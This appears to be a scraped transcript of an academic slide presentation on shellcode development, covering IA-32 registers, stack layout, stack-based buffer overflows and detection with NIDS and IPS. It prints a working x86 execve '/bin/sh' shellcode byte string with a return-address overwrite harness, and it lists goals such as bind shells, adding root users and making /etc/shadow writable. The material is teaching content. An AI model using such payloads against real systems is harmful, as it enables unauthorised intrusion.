shellcode development -femi oloyede -pallavi murudkar
TRANSCRIPT
![Page 1: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/1.jpg)
Shellcode Shellcode DevelopmentDevelopment
-Femi Oloyede-Femi Oloyede
-Pallavi Murudkar-Pallavi Murudkar
![Page 2: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/2.jpg)
AgendaAgenda
IntroductionIntroduction What can Shellcode do?What can Shellcode do? Tools for Shellcode DevelopmentTools for Shellcode Development Understanding ShellcodeUnderstanding Shellcode Developing ShellcodeDeveloping Shellcode Methods of Detecting ShellcodeMethods of Detecting Shellcode
![Page 3: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/3.jpg)
IntroductionIntroduction
Shellcode is defined as a set of instructions Shellcode is defined as a set of instructions injected and then executed by an exploited injected and then executed by an exploited programprogram
Shellcodes are primarily used to exploit Shellcodes are primarily used to exploit buffer overflowsbuffer overflows
The most important task when creating The most important task when creating shellcode is to make it small and executableshellcode is to make it small and executable
![Page 4: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/4.jpg)
What can Shellcode do?What can Shellcode do?
Providing access to the attacked systemProviding access to the attacked system
Spawning /bin/sh [or] cmd.exe (local shell)Spawning /bin/sh [or] cmd.exe (local shell)
Binding a shell to a port (remote shell)Binding a shell to a port (remote shell)
Adding root/admin user to the systemAdding root/admin user to the system
Chmod()’ing /etc/shadow to be writeableChmod()’ing /etc/shadow to be writeable
![Page 5: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/5.jpg)
Tools for Shellcode Tools for Shellcode developmentdevelopment
Nasm Used to write assembly codeNasm Used to write assembly code
Gdb GNU debugger to analyze core dump filesGdb GNU debugger to analyze core dump files
Objdump To disassemble fileObjdump To disassemble file
Ktrace Trace all system calls a process is usingKtrace Trace all system calls a process is using
![Page 6: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/6.jpg)
Next ( Femi )
Understanding ShellcodeUnderstanding Shellcode
Developing ShellcodeDeveloping Shellcode
Methods of Detecting ShellcodeMethods of Detecting Shellcode
![Page 7: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/7.jpg)
Understanding Shellcode
IA-32 Machine Architecture (instruction set & registers)
Program Flow dynamics - Processes Memory Organization and context switching during function-calls and interrupt processing.
Shellcode is injected via the modification of the return address of a function by way of a stack-based buffer overflow.
![Page 8: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/8.jpg)
Machine Architecture
Refer to IA-32 Intel® Architecture Software Developer's Manual Volume 1: Basic Architecture”
A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.
EBP Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes used as a general data or address register.
ESI General register or "source index" for string operations. Also has a one-byte LODS[size] instruction for loading data from memory to the accumulator.
EDI General register or "destination index" for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.
ESP Stack pointer. Is used to hold the top address of the stack.
EIP Instruction pointer. Holds the current instruction address.
![Page 9: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/9.jpg)
Program Flow Dynamics
Text Area
Initialized and Un-initialized Data Area
Stack
Lower memory address
Higher memory address
void A(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { A (1, 2, 3); return 0; }
pushl $3 pushl $2 pushl $1 call function pushl %ebp movl %esp,%ebp subl $20,%esp
C code Assembly Code
![Page 10: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/10.jpg)
Program Flow Dynamics (cont)
EBP (Base or frame Pointer) [mov1 $esp, %ebp]
SFP b a RET Buffer1 Buffer2 c
4 4 4 4 bytes
8 12 4
Bottom of Stack
Top of Stack
Address of previous frame pointer [push %ebp]
Address of ‘return 0’ instruction of main
ESP (Stack Pointer) [sub1 $20, %esp]
EIP (Instruction Pointer) Address of last instruction in A
![Page 11: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/11.jpg)
Stack Based Buffer Overflow
void A(char charPtr *str) { char buffer[4]; strcpy(buffer,str);}
void main() { char BigggerString[12] = “AAAAAAAAAAAA”; A(Biggerstring);}
SFP (4) charPtrRET (4)Buffer1 (4)
AAAA AAAAAAAA
Bottom of Stack
Top of Stack
Stack Buffer Overflow
![Page 12: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/12.jpg)
Developing Shellcode
Finding the Vulnerability Writing the Shellcode
Shellcode is sequence of machine instructions or opcode.
To take advantage of the injected code and to gain access to the target system, system calls must be used
On Linux there are two ways of implementing a system call, they are icall87/icall27 gates and ‘INT 0x80’ software interrupts
![Page 13: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/13.jpg)
Example – Spawning a Shell
Write C code Extract the assembly code Extract the opcode Append an function exit
opcodes to allow the function exit gracefully
Initialize a buffer with the opcode.
#include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }
![Page 14: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/14.jpg)
Example – Spawning a Shell cont’
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() { int *retPtr; retPtr = (int *)&ret + 2; (*retPtr) = (int) shellcode; }
SFP (4) RET (4) retPtr (4)
Address of
shellcode Buffer
bu
Address of this + 2 words
Bottom of Stack
Top of Stack
…
![Page 15: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/15.jpg)
Methods for Detecting Shellcode
NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using Signature databases and Protocol analysis methods
IPS (Intrusion Prevention System) identifies shellcode by running the code on a sandbox/virtualization in order to detect if the given code is malicious or not
![Page 16: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/16.jpg)
Conclusion
Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.
It is important that the shellcode developed is small in size
Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes
![Page 17: Shellcode Development -Femi Oloyede -Pallavi Murudkar](https://reader036.vdocuments.net/reader036/viewer/2022082613/5697bfbd1a28abf838ca2466/html5/thumbnails/17.jpg)
Questions?